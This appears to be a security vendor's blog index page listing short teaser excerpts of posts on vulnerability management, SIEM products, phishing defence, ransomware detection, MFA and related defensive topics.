best_practices_Vulnerability_Management

Best Practices for Vulnerability Management

One can broadly define vulnerability management as a set of processes and procedures to identify, analyze, and manage vulnerabilities across a critical service's operating environment. This broad definition extends to IT systems and infrastructure, which are now as critical as power generation facilities and resource gathering operations. Keeping in mind the growing number and sophistication of […]
Top 5 Takeaways for NIST 800-53 Rev 5

Top 5 Takeaways for NIST 800-53 Rev 5

Recapping a highlight from Cybersecurity Awareness Month, the National Institute of Standards and Technology (NIST) has released an update to its master IT security guidance document, Special Publication 800-53. This update, "Rev 5," is the first major change to SP 800-53 in seven years, and a lot has changed in cybersecurity since 2013. The new […]

What is Microsoft Azure Traffic Manager?

bal regions and secure an optimal level of availability and responsiveness for your services.  How Azure Traffic Manager Works  Azure Traffic Manager is directing client requests to the most suitable service endpoint by using a DNS (Domain Name Server). The load balancer examines the health of the endpoints and then applies a traffic-routing method to distribute the traffic.  […]
Microsoft Azure_secuity_center

What is Microsoft Azure Security Center?

Azure Security Center by Microsoft is a solution that provides unified security management across hybrid cloud workloads. It offers threat protection for data centers within both cloud workloads and on-premises. The platform also works with hybrid clouds that are not part of the Azure ecosystem. The Azure Security Center is designed to resolve a pressing problem when […]

RSA Cloud Security Solutions

RSA Security LLC is one of the leading providers of network security services focusing on encryption and data security. Launching their services back in 1984, they are a global security company gradually transforming their business to protect organizations in the cloud. Cloud security is not just a growing business but also an irreversible trend in […]
Google Chronicle ;google_chronicle_splunk

Google Chronicle vs Splunk

Alphabet’s announcement concerning the inclusion of big-data security into Chronicle led to a 5% drop in the value of Spunk’s shares and sparked a debate on which security information and event management (SIEM) tool supplies better options. As with many comparisons, a definite answer on which SIEM tool is best is one that comes with […]
Mimecast_Outlook_Plugin

Mimecast: Outlook Plugin

Mimecast is a security company that offers solutions for corporate users to secure their email communications along with threat detection technologies. Mimecast Outlook Plugin is a tool that works on Microsoft Exchange servers to protect your email platform within the widely used Outlook platform, covering a variety of threats. How the Mimecast Outlook Plugin Works […]

Google VirusTotal Overview

Lumifi has been working with leaders in malware detection and threat intelligence for years. As we launch our cloud-native Managed Detection and Response offering with Google Chronicle, we are also integrating with VirusTotal. Read our comprehensive guide to VirusTotal and its free and enterprise features. What is VirusTotal? Google’s VirusTotal is a web-based scanner that utilizes over 70 […]
SentinelOne_Security_Integrations

SentinelOne: Security Integrations

SentinelOne is known for its AI-driven endpoint security protection platform (EPP). The lightweight agent integrates with leading security tools and platforms. Their team regularly announces partnerships and development with best-in-breed tools. API-First Approach SentinelOne was created with an API-first approach, made to interface seamlessly with leading security tools. Their current automation integrations include SonicWall, Fortinet, […]
MFA Solutions

Popular MFA Solutions

Multi-factor authentication (MFA) is a method and technology to verify a user’s identity requiring two or more credential category types for the user to be able to log into a system or make a transaction. The MFA method requires a successful combination of at least two independent credentials, which generally combines one of three following credential categories:  Note: Multi-factor authentication is only not limited […]
blog_managed_security_services

What are Managed Security Services?

The use of managed services is growing as organizations struggle supervising multiple sophisticated software systems and advanced corporate networks. One specific area of company outsourcing is the implementation and management of cyber defenses to protect digital assets against ever-evolving security threats.  Managed Security Service Providers (MSSPs) address several business-critical issues organizations face when it comes to cybersecurity. A managed security service provider can assist in creating and deploying complex security infrastructure, managing platforms and tools, performing incident response, and providing continuous 24/7/365 monitoring.  […]
Yet Another Ransomware That Can be Immediately Detected with Process Tracking on Workstations; EXE

Yet Another Ransomware That Can be Immediately Detected with Process Tracking on Workstations

As I write this, yet another ransomware attack is underway. This time it’s called Petya, and it again uses SMB to spread. But here’s the thing — it uses an EXE to get its work done.
Remote Workforce Greg Foss; blog_carbon_black_video

VIDEO: Remote Workforce Roundtable Interview with Greg Foss

The full interview with Greg Foss, Senior Threat Researcher at VMware Carbon Black an endpoint protection focused cybersecurity solutions provider. The interview is around the recent shift to a remote workforce due to the COVID-19 pandemic. Topics of the interview include the marketing hype, addressing a remote workforce and moving forward with the Coronavirus implications. Questions Include: As […]

What is a VPN?

A virtual private network (VPN) enables two or more devices to submit and receive data using a secure private connection over a public network such as the Internet. VPNs use a technology called "tunneling" to establish a secure connection between an organization's network and an outside network through the insecure environment of a public network […]
Phishing on the Rise During the Pandemic – Here' How to Fight It

Phishing on the Rise During the Pandemic – Here' How to Fight It

Cybersecurity threats based on major disasters or world events are nothing new. During the coronavirus pandemic, one threat in particular has increased much more quickly than others: phishing for sensitive information in disguised emails. During March 2020 alone, phishing attacks were up 667 percent! Protecting your system from the malicious intrusion of phishing emails is […]
futuristic-science-fiction-tunnel-corridor-with-lines-neon-blue-red-lights_181624-21143 Exabeam

Leveraging the Power of Exabeam

Organizations of all sizes are dealing with more data than ever before, and as Lumifi learns about increasingly complex attack vectors, it is worth noting that traditional SIEM may no longer fit the purpose of the modern security program. Traditional SIEMs are based on correlation rules, with no machine learning and no behavioral monitoring. Security teams, […]
Leveraging the Power of Exabeam

Leveraging the Power of Exabeam

Organizations of all sizes are dealing with more data than ever before, and as Castra learns about increasingly complex attack vectors, it is worth noting that traditional SIEM may no longer fit the purpose of the modern security program.

What is Email Encryption?

Encryption is a method to cypher data that a user sends and receives, as well as data that resides on endpoints and servers. Any organization must handle Data at Rest and Data in Transit, the former being the data stored on corporate endpoints and servers while Data in Transit representing any message or document employees […]
How a SOC Handles Credential Harvesting

How a SOC Handles Credential Harvesting

Dealing with credential harvesters has its perks. Day in and day out I get to personally observe how sophisticated a phishing website can be. Some websites are so elaborate that only a trained analyst can identify them, while others are so obvious no one in their right mind would fall for it. Either way, if […]
SCADA and IoT cybersecurity; what_is_scada_iot

What is SCADA and IoT?

Learn about the difference between SCADA and IoT systems and how they work and compare to one another. What are SCADA systems? Supervisory control and data acquisition (SCADA) systems have been used for decades to monitor and control production facilities or equipment across industries such as oil and gas refining, energy distribution, water management, waste […]

Sarbanes-Oxley Act Overview

The Sarbanes-Oxley Act (SOX) was enacted in 2002 following a series of corporate scandals involving large public companies in the United States. The main goal of the legislation was to restore the trust in the U.S. financial markets and prevent public companies from defrauding their investors. The law, also known as the “Public Company Accounting […]
remote work cybersecurity; Ensuring the Cybersecurity of a Remote Workforce

Ensuring the Cybersecurity of a Remote Workforce

As the COVID-19 pandemic continues to grip the globe, many companies are finding it necessary to transition from on-site to remote work – and experts warn this could be the new normal for the foreseeable future. Is your company ready to make the switch securely? Lumifi has some tips on making the transition with cybersecurity […]
FBI Warns ICS Cybersecurity Under Attack by Kwampirs

FBI Warns ICS Cybersecurity Under Attack by Kwampirs

The ICS sector is under attack. According to the Federal Bureau of Investigation (FBI), a new security threat is on the horizon for those in the Industrial Control System (ICS) sector. While the Kwampirs remote access Trojan (or RAT) is not new, it is now targeting ICS companies and especially the energy sector. The FBI […]
Carbon Black (CB) Defense Sensor

How to Deploy: Carbon Black (CB) Defense Sensor

Carbon Black (CB) Defense is a distributed process monitoring tool for threat detection across enterprise networks. The Carbon Black sensor executes data capturing activities to discover suspicious activities that occur within a network. Once deployed, the CB Defense sensor stays on and always collects data that can be categorized and analyzed for suspicious activities To […]
5 Ways to Protect Your Business' Data During Tax Season

5 Ways to Protect Your Business' Data During Tax Season

If you're an accountant or tax professional, you know that tax season is also scam season and that you're a prime target. Cybercriminals are using new, sophisticated scams that can compromise your website or infiltrate your systems with remote desktop software. These join the more traditional email-based attacks that trick you into installing malware that […]
why_phishing_is_still_problem

Why Phishing is Still a Problem

Is Phishing Still a Problem?The short answer is yes. The long answer is that it is a growing problem for businesses each day which requires greater defense. Phishing is the most popular attack vector for criminals and has grown 65% in the last year, according to Retruster. Lumifi is here to explain phishing, how attacks […]
Lumifi_Successful_Password_Policies/password security policy

Successful Password Policies for Organizations

Learn some of the basic considerations when establishing a strong password policy for your organization. Find out some of the best practices and industry standards when it comes to user access and a password policy framework. Most places of business require that their employees access their facilities by using a key or key card.  In […]
Improving Visibility and Preventing a Miss - Part 1: Mandatory PowerShell Logging

Improving Visibility and Preventing a Miss - Part 1: Mandatory PowerShell Logging

One of the greatest risks for a SIEM or SOAR platform is missing that one event that helps with accurate detection. In general, misses can occur for several reasons, although in our experience, misses mostly stem from incorrect/empty PowerShell logs or merely a lack of logging required for advanced detection.
Microsoft Releases Notice of More RDP Vulnerabilities

Microsoft Releases Notice of More RDP Vulnerabilities

Two more security issues announced surrounding Remote Code Execution against Remote Desktop Services (RDP). Microsoft released a notice today concerning two vulnerabilities, which would result in a Remote Code Execution vulnerability against the RDP.  These are being tracked under CVE-2019-1181 and CVE-2019-1182. This is akin the previous vulnerability that we notified you on, CVE-2019-0708, aka […]
Everyone Wants to Be a Penetration Tester

Everyone Wants to Be a Penetration Tester

There is a lot more to cyber security than just hacking... So… Everyone wants to be a penetration tester! Lately I’ve been speaking at events, conducting interviews, mentoring new security professionals and students and every single person when asked how they want their career to progress or what they are interested in doing, like clockwork […]
The Four Pillars of Network Security

The Four Pillars of Network Security

Every organization works hard to attain a healthy security posture. But what does that mean? It involves a properly resourced team of network security experts working to leverage the latest information security tools. The job of the security team is to prevent attacks before they happen, protect the organization in the case of an attack, […]
The True Cost of Information Security

The True Cost of Information Security

In-House vs. Outsourced SIEM Management: Discover the True Cost of IT Security (Updated November 2022) Your SIEM management needs will grow over time. Can your information security team follow suit? Security information event management is one of the pillars of effective information security. Capturing and investigating event logs lets security operators detect and respond to […]
Block Threats with Castra & Netshield

Block Threats with Lumifi & Netshield

Lumifi can now combine the power of Netshield's active blocking with AlienVault's USM and immediately block rogue devices AND monitor egress network traffic to effectively block malicious behaviors like malware and phishing. Through the power of Netshield's Network Access Control (NAC), Lumifi can offer unrivaled protection for the inside of your network. Firewalls are a […]
Top 5 Cybersecurity Steps to Take in 2019

Top 5 Cybersecurity Steps to Take in 2019

Cross Posted from Net Friends Author(s): Net Friends
Beginners Guide to IDS & Unified Threat Management (UTM)

Beginners Guide to IDS, IPS & UTM

There is often a lingering and general confusion over the acronyms IDS and IPS, and how they are like or unlike UTM software modules. Everyone likes primers and simple descriptive definitions; so let's take a look at IDS, IPS, and UTM through that lens. IDS An Intrusion Detection Sensor (IDS) is a tool that most […]
Why Set-and-Forget SIEM Deployments Often Fail

Why Set-and-Forget SIEM Deployments Often Fail

(Updated April 2022) There are many ways to optimize and automate your SIEM workflow, but you can't replace the human element. 
Shadyware ... Malware or Legit Software

Shadyware ... Malware or Legit Software

What's the difference between malware and legitimate software? Just as malware is often purported to be legitimate software, legitimate software sometimes uses unethical marketing and operating practices. Some folks term this "Shadyware." It is marketed as useful software, which it may be in part, but it also contains annoying or harmful functionality that negatively impacts […]
Adblocking

Adblocking

Adblocking is becoming a more and more contentious topic in recent days. Publications, understandably, do not want people to block ads - they derive much of their revenue from them. Users find them to be intrusive and often feel that they impede their usage of a site; and, given the recent meteoric rise of malvertising, […]
Egress Filtering: A Valuable Part of Your Multi-layered Security Posture

Egress Filtering: A Valuable Part of Your Multi-layered Security Posture

The concept has become increasingly important as cloud infrastructure expands throughout the enterprise IT network. (Updated May 2022)
Network segmentation

Network segmentation

Network segmentation is the practice of dividing a formerly 'flat' network [where every device can contact every other device] into a series of segments that have restricted communication between them. What's this mean in real terms, though? And why would you want it - and is it useful outside of making PCI compliance easier? In […]
Four Pillars of Information Security

Four Pillars of Information Security

Every organization is working hard to possess a "strong security posture." But what does that mean? A strong security posture, means you possess a healthy quantity and quality of Information Security Experts (Human Beings) and Information Security Tools (Technology/Products). Information Security Experts are leveraging Information Security Tools to prevent attacks before they happen, protect the […]

🚨 New Webinar Alert! 🚨

Q2: SOC Quarterly Threat Briefing

🗓️ Date: July 24th, 2024
🕒 Time: 11 AM (PT)

Secure Your Spot!
Privacy PolicyTerms & ConditionsSitemapSafeHotline
magnifiercrossmenuchevron-down linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram